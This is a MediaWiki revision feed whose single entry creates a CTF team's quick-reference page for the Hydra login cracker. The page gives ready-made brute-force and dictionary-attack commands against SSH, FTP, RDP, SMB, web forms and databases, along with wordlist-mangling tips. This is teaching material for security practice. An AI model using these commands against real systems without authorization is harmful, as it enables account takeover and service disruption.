<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.brunnerne.dk/index.php?action=history&amp;feed=atom&amp;title=Hydra</id>
	<title>Hydra - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.brunnerne.dk/index.php?action=history&amp;feed=atom&amp;title=Hydra"/>
	<link rel="alternate" type="text/html" href="https://wiki.brunnerne.dk/index.php?title=Hydra&amp;action=history"/>
	<updated>2026-07-01T04:19:50Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.43.1</generator>
	<entry>
		<id>https://wiki.brunnerne.dk/index.php?title=Hydra&amp;diff=66&amp;oldid=prev</id>
		<title>The.mikkel: Created page with &quot;&#039;&#039;&#039;Hydra&#039;&#039;&#039;, often referred to as &#039;&#039;&#039;thc-hydra&#039;&#039;&#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.  == Core Syntax == The basic structure of a Hydra command is: &lt;code&gt;hydra [options] [[//service] | [service://]]&lt;target&gt;[:&lt;port&gt;]&lt;/code&gt;  The most critical options define the credential lists: * &#039;&#039;&#039;&lt;code&gt;-l &lt;USE...&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.brunnerne.dk/index.php?title=Hydra&amp;diff=66&amp;oldid=prev"/>
		<updated>2025-08-04T10:56:02Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;#039;&amp;#039;&amp;#039;Hydra&amp;#039;&amp;#039;&amp;#039;, often referred to as &amp;#039;&amp;#039;&amp;#039;thc-hydra&amp;#039;&amp;#039;&amp;#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.  == Core Syntax == The basic structure of a Hydra command is: &amp;lt;code&amp;gt;hydra [options] [[//service] | [service://]]&amp;lt;target&amp;gt;[:&amp;lt;port&amp;gt;]&amp;lt;/code&amp;gt;  The most critical options define the credential lists: * &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-l &amp;lt;USE...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;#039;&amp;#039;&amp;#039;Hydra&amp;#039;&amp;#039;&amp;#039;, often referred to as &amp;#039;&amp;#039;&amp;#039;thc-hydra&amp;#039;&amp;#039;&amp;#039;, is a parallelized network logon cracker. It is an essential tool for any CTF player when faced with a login prompt on a network service. This page serves as a quick reference for common Hydra commands and syntax.&lt;br /&gt;
&lt;br /&gt;
== Core Syntax ==&lt;br /&gt;
The basic structure of a Hydra command is:&lt;br /&gt;
&amp;lt;code&amp;gt;hydra [options] [[//service] | [service://]]&amp;lt;target&amp;gt;[:&amp;lt;port&amp;gt;]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The most critical options define the credential lists:&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-l &amp;lt;USER&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a single username.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-L &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a file containing a list of usernames.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-p &amp;lt;PASS&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a single password.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-P &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specifies a file containing a list of passwords.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-C &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Colon-separated file format, e.g., &amp;quot;user:pass&amp;quot;. Useful if you have paired credentials to test against multiple hosts.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-x &amp;lt;MIN:MAX:CHARSET&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Brute-force generation. E.g. &amp;lt;code&amp;gt;-x 1:3:aA1&amp;lt;/code&amp;gt; to try all 1-3 character combinations of lowercase, uppercase, and numbers.&lt;br /&gt;
&lt;br /&gt;
== Attack Modes: Dictionary vs. Brute-Force ==&lt;br /&gt;
Hydra supports two main attack methodologies. Understanding the difference is key to using the tool effectively.&lt;br /&gt;
&lt;br /&gt;
=== Dictionary Attack (Most Common) ===&lt;br /&gt;
A dictionary attack uses a predefined list of potential passwords (a &amp;quot;wordlist&amp;quot; or &amp;quot;dictionary&amp;quot;). This is the most common and efficient way to use Hydra, as it focuses on likely passwords. The quality of your wordlist is the most important factor for success. All commands using the &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-P&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; or &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-C&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; flags are performing a dictionary attack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# This is a dictionary attack using the rockyou.txt wordlist.&lt;br /&gt;
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Pure Brute-Force Attack ===&lt;br /&gt;
A pure brute-force attack systematically tries every possible combination of characters for a given length and character set. This is extremely slow and only practical for very short or simple passwords (e.g., 4-digit PINs). This mode is enabled with the &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-x&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; flag.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Tries to find a 4-digit numeric PIN for the user &amp;#039;root&amp;#039; (charset &amp;#039;1&amp;#039; = digits)&lt;br /&gt;
hydra -l root -x 4:4:1 ssh://10.10.10.10&lt;br /&gt;
&lt;br /&gt;
# Tries all 1 to 3 character lowercase passwords (charset &amp;#039;a&amp;#039; = lowercase letters)&lt;br /&gt;
hydra -l user -x 1:3:a telnet://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Note on Charsets:&amp;#039;&amp;#039;&amp;#039; &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; = digits, &amp;lt;code&amp;gt;a&amp;lt;/code&amp;gt; = lowercase letters, &amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; = uppercase letters; any other character is added to the set literally (e.g. &amp;lt;code&amp;gt;aA1!&amp;lt;/code&amp;gt;). This matches the &amp;lt;code&amp;gt;-x 1:3:aA1&amp;lt;/code&amp;gt; example above; see &amp;lt;code&amp;gt;hydra -x -h&amp;lt;/code&amp;gt; for the full description.&lt;br /&gt;
&lt;br /&gt;
== Common Command Flags ==&lt;br /&gt;
These flags are used in almost all scenarios to control Hydra&amp;#039;s behavior.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-t &amp;lt;TASKS&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Number of parallel connections (threads). Default is 16. For CTFs, a higher number like &amp;lt;code&amp;gt;-t 64&amp;lt;/code&amp;gt; is common, but be careful not to DoS the service.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-V&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Verbose mode. Shows every attempt.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-d&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Debug mode. Even more verbose.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-f&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039; or &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-F&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Stop after finding the first valid credential pair (&amp;lt;code&amp;gt;-f&amp;lt;/code&amp;gt; stops per host, &amp;lt;code&amp;gt;-F&amp;lt;/code&amp;gt; stops the whole run when several hosts are targeted). &amp;#039;&amp;#039;&amp;#039;Crucial for speed in CTFs.&amp;#039;&amp;#039;&amp;#039;&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-o &amp;lt;FILE&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Output found credentials to a file.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-s &amp;lt;PORT&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Specify a non-default port for the service.&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;&amp;lt;code&amp;gt;-w &amp;lt;TIME&amp;gt;&amp;lt;/code&amp;gt;&amp;#039;&amp;#039;&amp;#039;: Set a maximum time to wait for a response (in seconds).&lt;br /&gt;
&lt;br /&gt;
== Protocol-Specific Examples ==&lt;br /&gt;
Below are common commands for services frequently encountered in challenges. We&amp;#039;ll assume common wordlists like &amp;lt;code&amp;gt;/usr/share/wordlists/rockyou.txt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== SSH (ssh) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Single user, password list&lt;br /&gt;
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.1.23&lt;br /&gt;
&lt;br /&gt;
# User list, single password&lt;br /&gt;
hydra -L users.txt -p &amp;#039;password123&amp;#039; 10.10.1.23 ssh&lt;br /&gt;
&lt;br /&gt;
# User list, password list, on a non-standard port&lt;br /&gt;
hydra -L users.txt -P passwords.txt -t 64 -f -s 2222 10.10.1.23 ssh&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== FTP (ftp) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Check for anonymous login&lt;br /&gt;
hydra -l anonymous -p &amp;#039;&amp;#039; ftp://192.168.1.5&lt;br /&gt;
&lt;br /&gt;
# Brute-force with user and password lists&lt;br /&gt;
hydra -L users.txt -P pass.txt ftp://192.168.1.5 -t 32 -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Telnet (telnet) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a telnet service&lt;br /&gt;
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.12.110.8 telnet&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SMB (smb) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force Windows SMB shares&lt;br /&gt;
# Note: the service is given as a URL-style prefix (smb://) rather than as a trailing service name&lt;br /&gt;
hydra -L users.txt -P passwords.txt smb://10.10.14.2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== RDP (rdp) ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a Remote Desktop Protocol service&lt;br /&gt;
hydra -L usernames.list -P rockyou.txt rdp://10.20.30.40 -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== HTTP Basic Authentication ===&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force a directory protected by .htaccess&lt;br /&gt;
hydra -L users.txt -P pass.txt 192.168.5.15 http-get /admin&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== HTTP POST Form ===&lt;br /&gt;
This is one of the most common web challenges. You need to inspect the login form to find the parameters.&lt;br /&gt;
&lt;br /&gt;
# &amp;#039;&amp;#039;&amp;#039;Step 1:&amp;#039;&amp;#039;&amp;#039; Inspect the form. Go to the login page, open browser developer tools (F12), and look at the Network tab when you submit a failed login. Find the POST request and its Form Data.&lt;br /&gt;
# Let&amp;#039;s say you find:&lt;br /&gt;
#* Login page: &amp;lt;code&amp;gt;/login.php&amp;lt;/code&amp;gt;&lt;br /&gt;
#* Username field name: &amp;lt;code&amp;gt;uname&amp;lt;/code&amp;gt;&lt;br /&gt;
#* Password field name: &amp;lt;code&amp;gt;pword&amp;lt;/code&amp;gt;&lt;br /&gt;
#* Failure message on the page: &amp;lt;code&amp;gt;Invalid Credentials&amp;lt;/code&amp;gt; or &amp;lt;code&amp;gt;Login failed&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# &amp;#039;&amp;#039;&amp;#039;Step 2:&amp;#039;&amp;#039;&amp;#039; Craft the Hydra command.&lt;br /&gt;
# The syntax is: &amp;lt;nowiki&amp;gt;http-post-form &amp;quot;&amp;lt;login_page&amp;gt;:&amp;lt;form_parameters&amp;gt;:&amp;lt;failure_message&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
# Use &amp;lt;code&amp;gt;^USER^&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;^PASS^&amp;lt;/code&amp;gt; as placeholders.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Example command&lt;br /&gt;
hydra -L users.txt -P passwords.txt 10.10.10.10 http-post-form &amp;quot;/login.php:uname=^USER^&amp;amp;pword=^PASS^:F=Invalid Credentials&amp;quot; -V -f&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Pro Tip:&amp;#039;&amp;#039;&amp;#039; If success is indicated by a redirect (HTTP 302) or by a session cookie rather than by an error message in the page body, use a success condition (&amp;lt;code&amp;gt;S=&amp;lt;/code&amp;gt;) instead of a failure condition (&amp;lt;code&amp;gt;F=&amp;lt;/code&amp;gt;).&lt;br /&gt;
** On success redirect to /dashboard.php: &amp;lt;code&amp;gt;S=Location: /dashboard.php&amp;lt;/code&amp;gt;&lt;br /&gt;
** On success set cookie &amp;quot;sessionID&amp;quot;: &amp;lt;code&amp;gt;S=sessionID&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Database Services ===&lt;br /&gt;
==== PostgreSQL (postgres) ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force PostgreSQL. Default user is often &amp;#039;postgres&amp;#039;.&lt;br /&gt;
hydra -l postgres -P passwords.txt 127.0.0.1 postgres&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== MySQL (mysql) ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Brute-force MySQL/MariaDB. Default user is often &amp;#039;root&amp;#039;.&lt;br /&gt;
hydra -l root -P passwords.txt 127.0.0.1 mysql&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== CTF Tips &amp;amp; Best Practices ==&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Leveraging Password Hints (Rule-Based Attacks):&amp;#039;&amp;#039;&amp;#039; CTFs often provide hints (e.g., a pet&amp;#039;s name, a birth year, a company name). These are not passwords themselves, but &amp;quot;base words&amp;quot;. You can use tools like John the Ripper (JtR) or Hashcat to apply mutation rules (mangling) to these base words to generate a powerful, custom password list.&lt;br /&gt;
*:&amp;#039;&amp;#039;&amp;#039;Step 1:&amp;#039;&amp;#039;&amp;#039; Create a file (e.g., &amp;lt;code&amp;gt;hints.txt&amp;lt;/code&amp;gt;) with your base words, one per line.&lt;br /&gt;
*:&amp;#039;&amp;#039;&amp;#039;Step 2:&amp;#039;&amp;#039;&amp;#039; Use JtR&amp;#039;s &amp;lt;code&amp;gt;--stdout&amp;lt;/code&amp;gt; mode to generate variations and save them to a new file.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# This command takes your hint words and applies common password rules (like adding &amp;#039;123&amp;#039;, &amp;#039;!&amp;#039;, etc.)&lt;br /&gt;
john --wordlist=hints.txt --rules=All --stdout &amp;gt; mangled_list.txt&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
*:&amp;#039;&amp;#039;&amp;#039;Step 3:&amp;#039;&amp;#039;&amp;#039; Use this new, highly-targeted list with Hydra.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
hydra -l someuser -P mangled_list.txt ssh://10.10.10.10&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Website Wordlists:&amp;#039;&amp;#039;&amp;#039; If the target is a company website, use a tool like &amp;#039;&amp;#039;&amp;#039;CeWL&amp;#039;&amp;#039;&amp;#039; to crawl the site and create a wordlist from its content. This can reveal project names, employee names, and other potential password components.&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cewl http://ctf.target.corp -d 2 -w custom_words.txt&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Start with defaults:&amp;#039;&amp;#039;&amp;#039; Before launching a massive brute-force, always check for default credentials (e.g., &amp;lt;code&amp;gt;admin:admin&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;root:password&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;test:test&amp;lt;/code&amp;gt;) and anonymous/guest access.&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Use &amp;lt;code&amp;gt;-f&amp;lt;/code&amp;gt; / &amp;lt;code&amp;gt;-F&amp;lt;/code&amp;gt;:&amp;#039;&amp;#039;&amp;#039; In a CTF, you usually only need one set of valid credentials. Use this flag to stop Hydra as soon as it finds one to save valuable time.&lt;br /&gt;
&lt;br /&gt;
* &amp;#039;&amp;#039;&amp;#039;Task Management (&amp;lt;code&amp;gt;-t&amp;lt;/code&amp;gt;):&amp;#039;&amp;#039;&amp;#039; A high task count is faster but can also lock you out or crash a fragile service. If you get lots of errors, try lowering the task count. Start with &amp;lt;code&amp;gt;-t 16&amp;lt;/code&amp;gt; and increase if the service seems stable.&lt;br /&gt;
&lt;br /&gt;
== See Also ==&lt;br /&gt;
* [https://github.com/vanhauser-thc/thc-hydra Official THC-Hydra GitHub Repository]&lt;br /&gt;
* [https://www.kali.org/tools/john/ John the Ripper for Rule-Based Wordlist Generation]&lt;/div&gt;</summary>
		<author><name>The.mikkel</name></author>
	</entry>
</feed>